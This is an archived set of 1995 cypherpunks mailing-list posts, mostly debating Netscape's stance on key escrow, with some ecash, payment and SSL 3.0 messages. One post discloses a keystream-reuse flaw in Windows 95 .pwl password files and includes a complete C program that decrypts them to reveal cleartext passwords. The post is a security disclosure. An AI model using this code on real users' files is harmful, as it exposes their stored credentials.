be calling the number listed on the disk itself tomorrow
during normal office hours in MD.









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: JR@ROCK.CNB.UAM.ES
Date: Mon, 4 Dec 95 07:21:26 PST
To: cypherpunks@toad.com
Subject: Re: Netscape gives in to key escrow
Message-ID: <951204173237.20a03d03@ROCK.CNB.UAM.ES>
MIME-Version: 1.0
Content-Type: text/plain


Black Unicorn <unicorn@polaris.mindport.net> wrote
>On Fri, 1 Dec 1995 JR@ns.cnb.uam.es wrote:
>
>> From:	SMTP%"tcmay@got.net"  1-DEC-1995 12:26:55.99
>
...
>
>You need to think real hard about how likely foreign customers on a scale 
>as large as the U.S. government are going to be attracted to a product 
>that forfeits its keys to the U.S. government.  Consider this problem 
>again in light of all the hand waving about the U.S. intelligence 
>agencies and industrial espionage/intelligence.

	I do, and I reckon most people, at this level now, worry more
about how nice pages look than their security. Mostly because there is
comparatively little interest yet. That's the whole issue: a company that
is aware of that and wants to be the first at occupying the market will
give security a second priority level -as most users do-. Look e.g. at
any OS and how secure it is...

	I'm not defending Netscape, I argue about the reasons that drive
the market and most companies -Netscape among them-.

> 
>Let's put this example in a more personal context, with you as the 
>netscape guru.  In fact, let us carry that assumption along, as really 
>I'm talking to the netscape insiders to begin with.

	Please, note that I have no liaison to Netscape. But I don't like all
this brouhaha about whether this or that guy is evil because s/he does/
doesn't hold with some principles/ends.

	If one wants to be effective, one needs to understand the other
side's point of view, so as to be able to develop coherent strategies that
work.

	Independently of what *my* personal convictions are -which I
have never stated-, you can't forget that not everybody holds to your
same ethics or needs to.

...
>
>Your faith in Joe Random vastly exceeds mine.

	So it seems. Anyway, that's the only resource we have. If Joe
Random doesn't care, then it doesn't matter too much what you or I
can say. Nor would it be correct that we imposed our view to the
majority of Joes.


...
>Your information cost is lower by a factor of 100 or more.  Putting the 
>burden on our shoulders, and then couching it in terms of the cypherpunks 
>being negative, when indeed we are merely pointing out to whoever will 
>listen that a spineless money decision has been made, is the center of 
>hypocrisy.  It sickens me.

	Again, I'm not Netscape. So, don't tell *me*. If it sickens you
the position of anyone, I'm sorry. It may sicken me too, but I don't
think that only will change how things are (sic).

...
>As does this psycho-babble trash.

	It may be trash. But it works. Sorry if you don't like it, but
that's how humans are.

>So when pinto's explode, I might as well just advertize hondas as a 
>'better value' and not mention the rather glaring fault in the competing 
>product?

	Well, that -as I said- may depend on where you are. In some
countries you could sue them, but you could not *say* they are bad.
Odd, isn't it? But so it is.

>I might add, few cypherpunks (to their great credit) sell their 
>software.  We are interested in the software being the strongest, and 
>best quality.
>
	So do I. And that's what I suggested: better alternatives. If
there are some, then market forces will drive everything to our side.
Just by making people angry we won't gain much.

..
>You mean to realize that Netscape could care less about the 'educated' 
>consumer who is displeased with the decision, and instead is following 
>that large nose which sniffs the wafting scent of green?

	Exactly. If you realize that, you know what the problem is. If
you assume any company has to be bounded by any cypherpunkish ideas,
which in addition hurt their business, then you are not addressing the
real problem.

...
>Either support GAK or do not.  Don't give us horseshit about how you 
>think we are being too hard on Netscape because we are educated 
>consumers, and because we realize that GAK crypto is not the best product it 
>could be.

	Sorry man, but as soon as Democracy comes in, elites go out the
window. It's the domain of the common man. If the common man doesn't hold
with the opinions of the educated man, then the educated man has nothing
to do.

>It is as much our right to gripe and moan about the spineless decision as 
>it is for you to make it.  To tell us to ignore it is hypocritical in the 
>extreme.  If your product is so superior, why the hell should you care 
>about a few cypherpunks moaning about this or that?  Aren't we members of 

	You can gripe or moan or do as you wish. So do I, and I chose to
express my opinion that educating the common man is more effective.

	And once more: it's not my product. I have nothing to do with 
Netscape. All I want is energies derived into effective courses.

>Take your emotional censorship elsewhere.  And while you're at it, try 
>making a superior product to please us, rather than some high-school 
>textbook psycho-babble about saying only nice things to the other 
>children in the sandbox.

	I fear it is you who's becoming emotional and censoring. I didn't
tell anybody to take his/her opinions anywhere else. I'm only exposing what
my opinion is on how cryptography should be promoted and what is the
-in my humble opinion- best course of action.

	As for "children in the sandbox"... it also seems I have some more
respect for those "Joe Random"s than you do. And even if they are so, I
prefer to take them into adulthood rather than keeping crypto priesthood
to myself and pontificating to them what they should do relying on me.

				jr




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Frank Andrew Stevenson <frank@funcom.no>
Date: Mon, 4 Dec 95 08:52:01 PST
To: cypherpunks@toad.com
Subject: Cracked: WINDOWS.PWL
Message-ID: <Pine.SGI.3.91.951204174641.2847A-100000@odin>
MIME-Version: 1.0
Content-Type: text/plain


A few days ago Peter Gutmann posted a description on how
Windows 95 produces RC4 keys of 32 bits size to protect
the .pwl files. I verified the information and wrote a
program to decrypt .pwl files with a known password, I then
discovered that the .pwl files were well suited for a known
plaintext attack as the 20 first bytes are completely predictable.

The 20 first bytes of any .pwl file contain the username, which
is the same as the filename, in capitals, padded with 0x00. From then
I wrote a program to bruteforce the .pwl file and optimized it
so it would run in less than 24 hours on an SGI. I ran a test
of the bruter software and recovered an unknown rc4 key in 8 hours,
but the decrypted file was still largely unintelligible, I then proceeded
to decrypt the file at all possible starting points, and discovered
valuable information (cleartext passwords) offset in the file.

This has enormous implications: RC4 is a stream cipher, it
generates a long pseudo random stream that it uses to XOR the
data byte by byte. This isn't necessarily weak encryption if you
don't use the same stream twice: however WIN95 does, every resource is
XORed with the same pseudo random stream. What's more the 20
first bytes are easy to guess. This is easy to exploit:
XOR the 20 bytes starting at position 0x208 with the user name
in uppercase, and slide this string through the rest of the file
(xoring it with whatever is there) this reveals the 20
first bytes of the different resources.

From there I went on to study the structure of the .pwl file it is
something like this (decrypted):

USERNAME.........wpwpwpwpwpwpwpwpwpwp
rs???????
rs
rs
rs???????????
rs???????

where wp is a word pointer to the different resources (from start
of pwl file). The 2 first bytes of the resource (rs) are its length in bytes
(of course XORed with RC4 output). It is then fairly easy to find all the
resource pointers by jumping from start of resource to next resource,
had it not been for the fact that the size sometimes is incorrect
(courtesy of M$)

What follows is a short C program that tries to remedy this and
reconstruct the pointer table, thus generating at least 54 bytes of the RC4
pseudorandom stream, and then proceeds to decrypt as much as possible from
the different resources.

What does this show? Although RC4 is a fairly strong cipher, it has the
same limitations as any XOR streamcipher, and implementing it without
sufficient knowledge can have dire consequences. I strongly suggest that
the programmers at Microsoft do their homework before trying anything like
this again! 


 
DISCLAIMER:
This is a quick hack, I don't make any claims about usefulness for
any purpose, nor do I take responsibility for use nor consequences of
use of the software. FUNCOM of Norway is not responsible for any of this,
(I speak for myself, and let others speak for themselves)

This source is hereby placed in the public domain, please
improve if you can.

--- glide.c ---

#include <ctype.h>	/* toupper */
#include <stdio.h>
#include <stdlib.h>	/* exit */
#include <string.h>


unsigned char Data[100001];
unsigned char keystream[1001];
int Rpoint[300];


int main (int argc,char *argv[]) {
	FILE *fd;
	int 	i,j,k;
	int	size;
	char ch;
	char *name;
	int cracked;
	int sizemask;
	int maxr;
	int rsz;
	int pos;
	int Rall[300]; /* resource allocation table */


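	if (argc<2) {
		printf("usage: glide filename (username)\n");
		exit(1);
	}
	
	/* read PWL file */

	fd=fopen(argv[1],"rb");
	if(fd==NULL) {
		/* report the file that failed to open, not the optional username */
		printf("can't open file %s\n",argv[1]);
		exit(1);
	}
	size=0;
	/* stop at EOF or when Data is full; EOF itself is never stored */
	while(size<100000 && (k=fgetc(fd))!=EOF) {
		Data[size++]=k;
	}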
	fclose(fd);

	/* find username */
	name=argv[1];
	if(argc>2) name=argv[2];
	printf("Username: %s\n",name);

	/* copy encrypted text into keystream */
	cracked=size-0x0208;
	if(cracked<0) cracked=0;
	if(cracked>1000) cracked=1000;
	memcpy(keystream,Data+0x208,cracked );

	/* generate 20 bytes of keystream */
	for(i=0;i<20;i++) {
		ch=toupper(name[i]);
		if(ch==0) break;
		if(ch=='.') break;
		keystream[i]^=ch;		
	};
	cracked=20;


	/* find allocated resources */

	sizemask=keystream[0]+(keystream[1]<<8);
	printf("Sizemask: %04X\n",sizemask);

	for(i=0;i<256;i++) Rall[i]=0;

	maxr=0;
	for(i=0x108;i<0x208;i++) {
		if(Data[i]!=0xff) {
			Rall[Data[i]]++;
			if (Data[i]>maxr) maxr=Data[i];
		}
	}
	maxr=(((maxr/16)+1)*16);	/* resource pointer table size appears to be divisible by 16 */

	/* search after resources */

	Rpoint[0]=0x0208+2*maxr+20+2;	/* first resource */
	for(i=0;i<maxr;i++) {
		/* find size of current resource */
		pos=Rpoint[i];
		rsz=Data[pos]+(Data[pos+1]<<8);
		rsz^=sizemask;
		printf("Analyzing block with size: %04x\t(%d:%d)\n",rsz,i,Rall[i]);
		if( (Rall[i]==0) && (rsz!=0) ) {
			printf("unused resource has nonzero size !!!\n");
			exit(0);
		}

		pos+=rsz;

		/* Resources have a tendency to have the wrong size for some reason */
		/* check for correct size */

		if(i<maxr-1) {
			while(Data[pos+3]!=keystream[1]) {
				printf(":(%02x)",Data[pos+3]);
				pos+=2; /* very rude may fail */
			}
		}

		pos+=2;	/* include pointer in size */
		Rpoint[i+1]=pos;
	}
	Rpoint[maxr]=size;

	/* insert Table data into keystream */
	for(i=0;i <= maxr;i++) {
		keystream[20+2*i]^=Rpoint[i] & 0x00ff;
		keystream[21+2*i]^=(Rpoint[i] >> 8) & 0x00ff;
	}
	cracked+=maxr*2+2;	

	printf("%d bytes of keystream recovered\n",cracked);

	/* decrypt resources */
	for(i=0;i < maxr;i++) {
		rsz=Rpoint[i+1]-Rpoint[i];
		if (rsz>cracked) rsz=cracked;
		printf("Resource[%d] (%d)\n",i,rsz);
		for(j=0;j<rsz;j++) printf("%c",Data[Rpoint[i]+j]^keystream[j]);
		printf("\n");
	}


	exit(0);	
}

--- end ---


#include <std/disclaimer.h> 
E3D2BCADBEF8C82F A5891D2B6730EA1B PGPencrypted mail preferred, finger for key






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: iagoldbe@csclub.uwaterloo.ca (Ian Goldberg)
Date: Mon, 4 Dec 95 14:54:48 PST
To: cypherpunks@toad.com
Subject: Re: Questions/Comments on ecash protocol (fwd)
In-Reply-To: <v02120d00ace710acf043@[192.0.2.1]>
Message-ID: <49vu6v$j0j@calum.csclub.uwaterloo.ca>
MIME-Version: 1.0
Content-Type: text/plain


In article <v02120d00ace710acf043@[192.0.2.1]>,
Lucky Green <shamrock@netcom.com> wrote:
>Hal wrote:
>[parts elided]
>
>>BTW since apparently both deposit and payment messages are not encrypted,
>>coins made out to "@" are in danger of being stolen both while en route
>>from customer to shop and from shop to bank.  This is significant from
>>the point of view of payee anonymous systems, which will need to use such
>>coins.  More encryption will be necessary when such coins are passed
>>around.
>
>Absolutely. Wildcard coins are stealable in transit. However, one might
>safely assume that transactions conducted using such coins be encrypted by
>other methods.
>
But do the current implementations support this?  Can Sam's Shop's ecash
client tell that the payment he just received was made out to "@", and
if so, should encrypt the deposit message to the bank?  What if Sam is not
around to enter his secret key?

   - Ian




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Mon, 4 Dec 95 15:00:36 PST
To: cypherpunks@toad.com
Subject: Privy Affairs
Message-ID: <199512042300.SAA17549@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   The WSJ and Financial Times report today on The New
   Transatlantic Agenda, the trade and security pact signed by
   the US and Europe yesterday to "boost cooperation."

      [WSJ] The accord's center piece commits the parties to
      working together on 150 specific policy areas, including
      cutting trade barriers, strengthening cooperation in
      nuclear nonproliferation and fighting international
      crime.

      "There are mixed urges in Europe right now," says Kirsty
      Hughes, head of the European program at the Royal
      Institute for International Affairs in London. "On one
      hand, the nations of Europe want to keep the U.S.
      involved in European affairs, and on the other, they
      want to develop their own economic, political and
      security arrangements."

   Then, the Fin Times piece, headlined "Clinton and EU
   leaders agree on crime," reports on a variety of issues but
   mentions only in passing the phrase "crime, drugs and
   terrorism."

   This treatment suggests that there is more boosting of
   security and crime-fighting cooperation than the press is
   reporting -- or privy to.

   Recall recent reports on:

      A World Trade Organization cyberspace czar to bring law
      and order to the unruly Net.

      EU plans for setting standards and certifications for
      products, including software for computer security,
      encryption and authentication.

      The future threat to "the West" by a hyper-cyber Asia
      [ex-colonies] deploying information wizardry to level
      the playing field.

   Cooperation on trade and "crime, drugs and terrorism" might
   then be a euphemism for economic aggression -- US-EU
   international affairs arranged to maximize benefits for
   transatlantic self-interests.

   If so, then cryptography is truly a highly valuable
   munitions for economic warfare, worthy of the strongest law
   and enforcement measures, closely fit to the power of the
   weapon. With US-EU GAK and ITAR to protect markets of the
   transatlantic super-nation and selected meta-atlantic
   partners in crime-pure joy.

   Would Michael Froomkin, RIIA Foreign Associate, care to 
   generously unscramble this international affairs sigint?

   Air the pinstriped privy, ahem.












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@mbcl.rutgers.edu>
Date: Mon, 4 Dec 95 15:40:43 PST
To: hfinney@shell.portal.com
Subject: Re: towards a theory of reputation
Message-ID: <01HYF42AZPR49S3PZW@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"hfinney@shell.portal.com"  "Hal"  2-DEC-1995 16:27:08.83

I do think the idea of analyzing costs in terms of "throwing away your
reputation" by cheating and starting anew is an interesting approach.
The question is whether you can really quantify the value of a
reputation.  I know in business now corporations do carry on their books
something called "good will" which I believe is roughly the value of
their good name and trade marks.  However it is not normally considered
to be a major asset, I think.
--------------------
	How much of an asset it is considered to be tends to depend on the size
of the corporation and on the business. For instance, when one doctor buys out
another's practice, "good will" is usually one of the larger categories. In
this case, I believe (it's been a bit since I read about it) that this
essentially is the value of recommendations and of the name of the office.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@mbcl.rutgers.edu>
Date: Mon, 4 Dec 95 16:04:42 PST
To: ecarp@netcom.com
Subject: Re: SEN_sor
Message-ID: <01HYF48O4X749S3PZW@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"ecarp@netcom.com"  4-DEC-1995 15:36:34.26

Oh, hell, even I can do *that*.  Let's see ... motherboard, $100.  
Floppy drive and controller, $50.  14.4KB modem, $50.  Case and power 
supply, another $50 or so.  $250 profit.
----------------------
	You appear to be forgetting the interface to the TV set; it will cost
more than for a monitor, unless I've missed something in my last few PC
purchases.
	-Allen 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@mbcl.rutgers.edu>
Date: Mon, 4 Dec 95 16:05:32 PST
To: sameer@c2.org
Subject: Re: Meeting notes from ANSI X.9 Meeting on Electronic Payment
Message-ID: <01HYF4D3MY5S9S3PZW@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"sameer@c2.org"  "sameer"  4-DEC-1995 15:47:39.33

	It doesn't appear that these people seem to care about
cash-like anonymous token-based payment schemes. Is that a valid
assessment? What is needed to make these people start caring about
that?
-----------------
	I doubt that anyone from a CC company is going to have much enthusiasm
for anonymous payment methods. One way in which they (and the credit bureaus,
of course) make money is via the information they can gain from credit card
usage.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Mon, 4 Dec 95 16:22:24 PST
To: Scott Brickner <sjb@universe.digex.net>
Subject: Re: Netscape gives in to key escrow
In-Reply-To: <199512042259.RAA08133@universe.digex.net>
Message-ID: <Pine.SUN.3.91.951204191340.23041A-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 4 Dec 1995, Scott Brickner wrote:

> Black Unicorn writes:
> >I am most distressed because of what I see as a snowjob.
> >
> >"We are anti-GAK"
> >
> >Great, tell me what you have done to prevent GAK from proliferating.
> 
> This is a poor argument.

It would be if there were not some context here.  For example:

> 
> I'd consider myself "anti-war", though I've done nothing more than
> argue against it and behave peacefully myself.  I've even heard
> "pro-war" arguments and considered some of them valid, though not
> enough to change my opinion.

Yet I've not heard anyone else arguing, e.g., that you have done more to 
promote anti-war ideals than anyone else. (A case that was made for 
Netscape and crypto)  I have also not heard you assert that you are 
actively lobbying against war.  (As employees and others have argued 
Netscape is doing)  I have also not heard you flip flop on your 
position.  (Which in my view, and others', Netscape has).  Were you in a 
position where you had a great deal of influence over war policy, I think 
you would agree that others asking 'what exactly have you done to 
eliminate war' is not quite as alien to the context of your example.

In short, your example is argumentation by reduction.

> Netscape has pretty clearly said that they don't like the idea of GAK,

Their employees have also asserted that they are working actively to 
discourage GAK, that they are lobbying to get it (insert ambiguous words 
here) and on every attempt to get some clarification I have seen 
hedging, assertions that quickly dissolved under the mildest prodding, 
and snowjobbing.

> and that in fora where such things are discussed, they'll argue against
> it.  They've also said that they won't let mandatory GAK put them out
> of business.  That *doesn't* make them pro-GAK.

It certainly doesn't make them active "anti-GAK" either.  Netscape needs 
to realize that the sword they carry is sharp.  If they choose not to use 
it, I want to know why.  Actually, even if I don't know why, I don't 
care, so long as they don't lie or deceive, throwing up thin veils to 
conceal their lack of organization, appreciation of their position, or 
simple laziness and lack of concern.

> Jim Clark hasn't made any statements to the effect that *Netscape*
> supports GAK (quite the contrary), but he *has* noted the government
> position --- "GAK is necessary for law enforcement".
> 

---
My preferred and soon to be permanent e-mail address: unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ed Carp" <ecarp@netcom.com>
Date: Mon, 4 Dec 95 18:26:03 PST
To: cypherpunks@toad.com
Subject: Re: Do the Right Thing
Message-ID: <199512050326.VAA30525@khijol>
MIME-Version: 1.0
Content-Type: text/plain


> Date:          Mon, 4 Dec 1995 01:42:25 -0800
> To:            cypherpunks@toad.com
> From:          anonymous-remailer@shell.portal.com
> Subject:       Re: Do the Right Thing

> On Sun, 3 Dec 1995, Timothy C. May wrote:
> 
> 
> > Netscape, being the dominant browser company, and Microsoft, being the
> > dominant OS company, are in special positions to "build in Big Brother."
> > I'm not claiming they are, just that they are clearly in a position to make
> > it technologically more feasible to make non-GAK illegal. They both need to
> > carefully think about the role that's been "given" to them (whether by
> > fortune, hard work, or being in the right place at the right time) and do
> > what's right.
> 
> That's always a tough position to be in.  If Netscape or Microsoft
> knew what was the "right" thing to do, I don't doubt that they'd be
> doing it.

That's one of the most politically and socially naive statements I've 
ever heard.  Corporations *never* do the "right thing" unless it will 
increase their profits.  Remember, corporations are in business to 
make money by providing a product or service that people will pay 
money for.  Whatever gets in the way of that will fall by the 
wayside.  That's an economic fact of life.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Pat Farrell" <pfarrell@netcom.com>
Date: Mon, 4 Dec 95 18:06:00 PST
To: cypherpunks@toad.com
Subject: Re: Meeting notes from ANSI X.9 Meeting on Electronic Payment
Message-ID: <75960.pfarrell@netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


  rah@shipwright.com (Robert Hettinga)  writes:
>>        It doesn't appear that these people seem to care about
>>  cash-like anonymous token-based payment schemes. Is that a valid
>>  assessment? What is needed to make these people start caring about
>>  that?
> My guess is, they won't. Ever.
>
> <Elmer Gantry [snip]>

Reality check.

Accountants _know_ how to do books that deal with cash.
Most small businesses keep their books on a cash basis.
Cash was how the world worked until recently.

Accountants know how to meet acceptable auditing standards when
transactions are in cash. I learned this from the CPA I live
with.

Seems to me this list doesn't have enough folks with a grounding in
non-technical issues. Until the last 30+ years, the world lived
on cash. I like cash. I assume I'll like electronic cash once
people remember what cash is and model it correctly.

Got to get my beauty sleep before tomorrow's GAK export meeting...
Pat

Pat Farrell    Grad Student      http://www.isse.gmu.edu/students/pfarrell
Info. Systems & Software Engineering, George Mason University, Fairfax, VA
PGP key available on homepage               #include <standard.disclaimer>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@primenet.com>
Date: Mon, 4 Dec 95 13:13:22 PST
To: Ed Carp <ecarp@netcom.com>
Subject: Re: SEN_sor
In-Reply-To: <199512041905.NAA02443@khijol>
Message-ID: <Pine.BSD.3.91.951204210937.26870F-100000@usr2.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 4 Dec 1995, Ed Carp wrote:

> 
> Oh, hell, even I can do *that*.  Let's see ... motherboard, $100.  
> Floppy drive and controller, $50.  14.4KB modem, $50.  Case and power 
> supply, another $50 or so.  $250 profit.
> 
> What's so tough about that?  Not a bad deal for Acorn, if you ask me. 
>  Hell, maybe I'll go into business making the damned things for that 
> kind of profit margin...
> 

	actually, you need to produce it in volume for $50 to $62.50 in 
order to afford the overhead, sales effort, service effort, advertising, 
and that good stuff.

	other than the floppy drive, I can make it for less than $50 in 
exported cost from Hong Kong with a 486-33 knockoff.  Of course, you will 
charge the customer extra for the 256M extra memory....




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Phil Karlton <karlton@netscape.com>
Date: Mon, 4 Dec 95 21:29:32 PST
To: ssl-talk@netscape.com
Subject: New version of SSL 3.0
Message-ID: <30C3D8F8.2781@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


SSL 3.0 protocol has been substantially changed from earlier drafts to
fix a number of performance and cryptographic issues. The latest version
can be found as PostScript in a compressed tar file on

	ftp://ftp<N>.netscape.com/pub/review/ssl-spec.tar.Z

where <N> is a digit in the range [2-8]. An HTML version should be
available in a day or two. I will post the URL when that happens.

Netscape is also in the process of submitting this draft to IETF.

Questions and comments about this specification should all be directed
to ssl-talk@netscape.com. Answers and replies will be posted there. We
are quite interested in your feedback.

As new eyes see the spec for the first time, I suspect that we will be
notified about typos and areas that are not as clear as they should be.
As a result, there will probably be an update in 2 weeks or so.

PK
-- 
Philip L. Karlton		karlton@netscape.com
Principal Curmudgeon		http://www.netscape.com/people/karlton
Netscape Communications




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Mon, 4 Dec 95 21:39:02 PST
To: cypherpunks@toad.com
Subject: Re: GAK Flap Happening at a Good Time--Journalists Read!
In-Reply-To: <9512040703.AA14762@pulm1.accessone.com>
Message-ID: <30C3DA0C.5969@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Black Unicorn wrote:
> 
> On Sun, 3 Dec 1995 blancw@accessone.com wrote:
> 
> >
> > Uni, if you're so overwhelmingly and absolutely incensed with Netscape, why
> > don't you write to Jim Clark yourself and tell him about his spinelessness and
> > all your other opinions of him, his unacceptable attitude, and his worthless
> > company, instead of getting granular with Jim and Dan here on the list?
> >
> > After all, Jim Clark is the one who made the unpleasant statements.
> >
> >   ..
> > Blanc
> >
> 
> I would hope that others might recognize the trend in Netscape and work
> to act as I have.
> 
> I have written Mr. Clark.

  I have also forwarded some of the messages from this list to him.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Mon, 4 Dec 95 21:40:56 PST
To: cypherpunks@toad.com
Subject: Re: GAK Flap Happening at a Good Time--Journalists Read!
In-Reply-To: <199512040700.XAA14483@blob.best.net>
Message-ID: <30C3DA80.79F1@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


James A. Donald wrote:
> 
> At 12:19 AM 12/4/95 GMT, Dan Weinstein wrote:
> >I see, you cannot say that they are really supporting GAK based upon
> >the actual statements made, so you simply assert it.
> 
> You cannot say they oppose it either.  Jim Clark speaks about
> GAK using mostly pleasant sounding favorable words.
> 
> Let me hear him talk about GAK using plain words.
> 
> >Now given point B, I see no reason to expect that they would in the
> >past have done much more than they have.  Given point C, I see they
> >are currently expanding their lobbying.
> 
> I do not see that they are currently expanding their lobbying:  Indeed
> I do not see that they are currently lobbying.
> 
> >I sent a message to Netscape after reading the article that started
> >this,  It simply stated that I wanted clarification on their position
> >on GAK and that if they were to support it they would lose a loyal
> >customer.  I have since been convinced by Jeff Weinstein's posts to
> >this list that the company does not support GAK, and in fact they
> >oppose it.
> 
> I have been convinced that Jeff Weinstein opposes GAK
> 
> If his policy represents company policy then I hope to hear
> a similar statement signed authoritatively.
> 
> I have not seen that yet.

  It is coming.  It may take a few days because many of the
people involved are travelling over the next few days.  I will
send something to the list as soon as possible.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Mon, 4 Dec 95 22:30:37 PST
To: cypherpunks@toad.com
Subject: Re: Do the Right Thing
Message-ID: <199512050629.WAA28721@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 4 Dec 1995, Ed Carp wrote:

> > > Netscape, being the dominant browser company, and Microsoft,
> > > being the dominant OS company, are in special positions to
> > > "build in Big Brother."  I'm not claiming they are, just that
> > > they are clearly in a position to make it technologically more
> > > feasible to make non-GAK illegal. They both need to carefully
> > > think about the role that's been "given" to them (whether by
> > > fortune, hard work, or being in the right place at the right
> > > time) and do what's right.
> > 
> > That's always a tough position to be in.  If Netscape or Microsoft
> > knew what was the "right" thing to do, I don't doubt that they'd be
> > doing it.
> 
> That's one of the most politically and socially naive statements I've 
> ever heard.  Corporations *never* do the "right thing" unless it will 
> increase their profits.  

Sure, I realize this.  I'm very aware of it in fact.  

The art of persuasion is the science of selfish self-interest.  Once a
company realizes that their "profits" are in jeopardy, or that
individual corporate officers are liable to face prison time, then
they generally do the "right" thing, what's in their interest.

It's just like asking questions.  You never ask a question to which
you don't already have the answer.

> Remember, corporations are in business to 
> make money by providing a product or service that people will pay 
> money for.  Whatever gets in the way of that will fall by the 
> wayside.  That's an economic fact of life.

Sure.  This is true.  Facts of Life.  

Stiff upper-lip and such.



Alice de 'nonymous ...               <an455120@anon.penet.fi>


                                  ...just another one of those...


P.S.  This post is in the public domain.
                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Mon, 4 Dec 95 22:35:36 PST
To: cypherpunks@toad.com
Subject: Re: GAK_hit
In-Reply-To: <199512041603.IAA22793@blob.best.net>
Message-ID: <30C3E74F.4BB0@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


James A. Donald wrote:
> 
> At 09:25 AM 12/4/95 -0500, John Young wrote:
> >   12-4-95. W$Jabber:
> >
> >   "Microsoft Probe Spurs Subpoenas Tied to Internet.
> >   Antitrust Effort Appears Focused on Windows 95 Disabled
> >   Rival Software."
> 
> >      The subpoena issued to Netscape may be of particular
> >      significance. In the estimate of Netscape and industry
> >      observers,
> 
> I regularly use netscape on windows 95, and I conclude that
> this subpoena is pure, 100% harassment.

  I've heard that when a machine that already has Internet In A
Box, Netscape Navigator personal edition, or some other internet
software with a stack and dialer is upgraded to Win95, the win95
installation may somehow disrupt the functioning of the winsock
or dialer.  I've also heard that re-installing the application
will solve the problem.  I've never seen the problem myself,
and don't know anything about any subpoena...

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cactus@hks.net (Leslie Todd Masco)
Date: Mon, 4 Dec 95 20:07:35 PST
To: cypherpunks@toad.com
Subject: Re: Do the Right Thing
Message-ID: <199512050406.XAA03449@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <199512050326.VAA30525@khijol>, Ed Carp <ecarp@netcom.com> wrote:
>That's one of the most politically and socially naive statements I've 
>ever heard.  Corporations *never* do the "right thing" unless it will 
>increase their profits.

I just *love* hearing statments like this from people who have probably
never started their own businesses.

Corporations are no more or less than their component people.  If the people
running a corporation care about an issue, the corporation will act upon
it  -- bounded by the interaction of their survival instinct with their
assessment of reality.  How could it be otherwise? 

The literature out there abounds with counterexamples to the "corporations
are automata" idea (for some reason, they love to harp on Ben & Jerry's).
- -- 
Todd Masco     | "life without caution/ the only worth living / love for a man/
cactus@hks.net |  love for a woman/ love for the facts/ protectless" - A Rich
Cactus' Homepage
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMMPFSSoZzwIn1bdtAQG1FAGAsXRzDAFRmZWvyKt8AlkGvHfWgCth9izE
Ibj/E41hbgSTvppJot/OWcFpa00B46PD
=d6+o
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Tue, 5 Dec 95 23:21:36 PST
To: Scott Brickner <unicorn@schloss.li>
Subject: Re: Netscape gives in to key escrow
Message-ID: <199512060722.XAA25437@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 04:59 PM 12/4/95 -0600, Scott Brickner wrote:
>Netscape has pretty clearly said that they don't like the idea of GAK,

Actually netscape has not said that:

Jeff has said that netscape *will* say that real soon now.

 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
